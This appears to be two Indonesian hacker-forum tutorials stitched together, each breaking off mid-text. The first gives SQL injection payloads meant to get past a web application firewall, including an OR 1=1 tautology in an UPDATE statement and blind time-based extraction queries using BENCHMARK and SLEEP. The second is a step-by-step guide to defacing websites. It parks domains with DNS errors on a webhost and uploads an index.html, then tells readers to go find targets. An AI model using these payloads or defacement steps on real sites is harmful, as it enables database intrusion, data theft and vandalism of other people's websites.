Oke Disini Saya Akan Menjelaskan Tentang • Bypassing Injeksi SQL WAF Pasti Kalian Sudah Tidak Asing Lagi Ya Dengan Nama SQLi(Structure Query Language Injection) :v Injeksi SQL Ada dua jenis SQL Injection • SQL Injection into a String/Char parameter Example: SELECT * from table where example = 'Example' • SQL Injection into a Numeric parameter Example: SELECT * from table where id = 123 1. Eksploitasi kerentanan SQL Injection dibagi menjadi beberapa kelas sesuai dengan tipe DBMS dan kondisi injeksi. • A vulnerable request can get into Insert, Update, Delete, etc. Example: UPDATE users SET pass = '1' where user = 't1' OR 1=1--' 1. Injeksi SQL Buta Example: select * from table where id = 1 AND if((ascii(lower(substring((select user()),$i,1))))!=$s,1,benchmark(200000,md5(now()))) SLEEP(5)-- SELECT BENCHMARK(1000000,MD5('A')); id=1 OR SLEEP(25)=0 LIMIT 1-- id=1) OR SLE
Halo guys gw Cubjrnet7 Kali ini gw akan ngasih Tutorial Deface Poc Take over error domain with webhost Bahan bahan: Akun webhost SC dengan nama index.html Oke langsung saja ke step bay step:v 1. Masuk ke webhost Cok jika sudah masuk akan seperti ini Klik kelola website, ok sudah✓ 2.jika sudah di klik tampilannya akan seperti ini Nah abis itu kalian klik tombol upload. Otomatis di arah kan ke dashboard Tampilan dashboard seperti itu, kalian upload SC kalian, ingat harus index.html biar bisa ketebas:v biar kek heker, cara upload nya gimana? Klik aja gambar yang saya lingkari itu. Jika sudah kembali ke menu awal, klik gambar seperti yang saya lingkari dibawah ini. Jika gambarnya kurang jelas dibuka aja di tab baru gan:v, oke jika sudah kalian klik itu lalu klik ATUR LAMAN WEB Tampilannya akan seperti ini Abis itu klik tambah domain, tampilannya akan seperti ini Klik park domain Maka akan seperti ini, kita tinggal cari target aja guys caranya